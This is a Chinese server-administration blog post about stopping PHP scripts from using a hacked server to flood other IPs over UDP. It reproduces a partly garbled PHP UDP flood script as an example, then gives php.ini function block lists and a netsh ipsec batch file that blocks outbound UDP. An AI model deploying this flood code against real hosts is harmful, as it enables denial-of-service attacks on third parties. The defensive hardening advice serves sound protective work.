用PHP代码调用sockets,直接用服务器的网络攻击别的IP
2012年01月11日
用PHP代码调用sockets,直接用服务器的网络攻击别的I用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
表现特征:一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到ddos攻击是不同的,Ddos是不断收到大量数据包.
解决办法:
先停止IIS,这样就暂时没法对外攻击了,然后
禁止上述的代码:
在c:\windows\php.ini里设置:
disable_functions =gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后启动IIS
如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.
另外,对于没加密的php攻击代码,还可以用以下办法处理:
1.在IP策略,或防火墙中,禁止所有udp向外发送
将以下红色文本复制到记事本,另存为 banudp.bat 或任意名,双击运行即可,
REM 添加安全策略,名称
netsh ipsec static add policy name=我的安全策略
REM 添加 IP筛选器列表
netsh ipsec static add filterlist name=允许列表
netsh ipsec static add filterlist name=拒绝列表
REM 添加筛选器到IP筛选器列表(允许上网)
netsh ipsec static add filter filterlist=允许列表 srcaddr=me dstaddr=any description=dns访问 protocol=udp mirrored=yes dstport=53
REM 添加筛选器到IP筛选器列表(不让别人访问)
netsh ipsec static add filter filterlist=拒绝列表 srcaddr=any dstaddr=me description=别人到我任何访问 protocol=udp mirrored=yes
REM 添加筛选器操作
netsh ipsec static add filteraction name=可以 action=permit
netsh ipsec static add filteraction name=不可以 action=block
REM 创建一个链接指定 IPSec 策略、筛选器列表和筛选器操作的规则(加入规则到我的安全策略)
netsh ipsec static add rule name=允许规则 policy=我的安全策略 filterlist=允许列表 filteraction=可以
netsh ipsec static add rule name=拒绝规则 policy=我的安全策略 filterlist=拒绝列表 filteraction=不可以
REM 激活我的安全策略
netsh ipsec static set policy name=我的安全策略 assign=y
2.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词P
[b][/b]
发表评论
-
Linux USB架构浅谈-guolele
2012-01-20 00:51 698Linux USB架构浅谈-guolele ... -
sock编程技术
2012-01-20 00:51 548sock编程技术 2010年08月09日 同步,阻塞,异 ... -
UNIX TCP/IP配置与检测
2012-01-20 00:51 703UNIX TCP/IP配置与检测 2010年12月14日 ... -
Web Application Stress Tool
2012-01-20 00:50 535Web Application Stress Tool 20 ... -
Jabberd2源代码分析:c2s与router SASL验证过程
2012-01-20 00:50 616Jabberd2源代码分析:c2s与router SASL验证 ... -
android新手上路 一
2012-01-17 01:09 692android新手上路 一 2010 ... -
安卓模拟器手机上网,玩游戏
2012-01-17 01:09 859安卓模拟器手机上网,玩 ... -
下载安卓源代码过程
2012-01-17 01:09 508下载安卓源代码过程 2011年12月23日 linux和 ... -
如何导出wince6.0的SDK 添加MFC支持
2012-01-17 01:09 611如何导出wince6.0的SDK 添加MFC支持 2010年 ... -
修复工具类
2012-01-17 01:08 431修复工具类 2011年05月08日 ... -
服务器端发送推送数据
2012-01-15 19:50 928服务器端发送推送数据 ... -
ITV常见故障错误代码(中兴平台)
2012-01-15 19:50 861ITV常见故障错误代码(中 ... -
Java语言11个主要特性
2012-01-15 19:50 670Java语言11个主要特性 20 ... -
1201-p
2012-01-15 19:49 4931201-p 2011年11月30日 内存 威 ... -
shell小结(10)
2012-01-11 12:03 486shell小结(10) 2011年07月01日 #!/b ...
相关推荐
原生的Sockets我们已经写了很多,大家都知道定义一套完整的Socket通讯服务器和客户端以及网络通讯的协议是一件很麻烦的事情,而Cowboy.Sockets原理上也是使用Socket通讯为基础,帮助我们已经搭建好了通讯的服务器和...
<TCP IP Sockets in C, Second Edition Practical Guide for Programmers> 这是英语原版的,中文为:<TCP/IP Sockets编程(C语言实现)(第2版)英文原版>高清的!并且包含所有代码!整理不容易!
《Windows Sockets网络编程》分为三部分:第一部分(第1~6章),提供了翔实的背景知识和框架方面的概念,借助于此框架,读者可理解WinSock的具体细节,包括Windows Sockets概述、OSI网络参考模型、TCP/IP协议簇中的...
TCP_IP_Sockets_in_Java,有代码
精通Windows Sockets网络开发——基于Visual C++实现源代码
TCP/IP Sockets in C(Engish)
TCP IP Sockets in C Second Edition 编程(C语言实现) 源码
tcp ip sockets编程经典,很不错的一本网络编程书,并且讲解通俗易懂
用windows sockets 做的tcp服务器,win32控制台程序,一些最基本的网络编程知识,入门。
TCP IP Sockets in Java Practical Guide for Programmers, Second Edition
精通WindowsSockets网络开发随书源代码,可以学习windows网络编程的几种方式!
TCP/IP Sockets C 语言实现源代码
TCP/IP Sockets in C 第二版。详细介绍TCP/IP协议原理 着重讲解C语言的socket编程。代码示例,文字清晰,带书签,方便查阅。
TCP IP Sockets in C# 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn...
TCP_IP Sockets编程 C语言实现 第2版
Windows Sockets网络编程 Windows Windows Sockets网络编程 Windows Sockets网络编程 Sockets网络编程
用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下: 复制代码 代码如下: $packets = 0; $ip = $_GET[\’ip\’]; $rand = $_GET[\’port\’]; set_time_limit(0); ignore_user_abort(FALSE); $exec_...
精通Windows Sockets 网络编程源代码,希望对大家有帮助。
Write Socket server by .NET Framework class.
一、php对外发包分析 用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下: 代码如下: $packets = 0; $ip = $_GET[\’ip\’]; $rand = $_GET[\’port\’]; set_time_limit(0); ignore_user_abort(FALSE...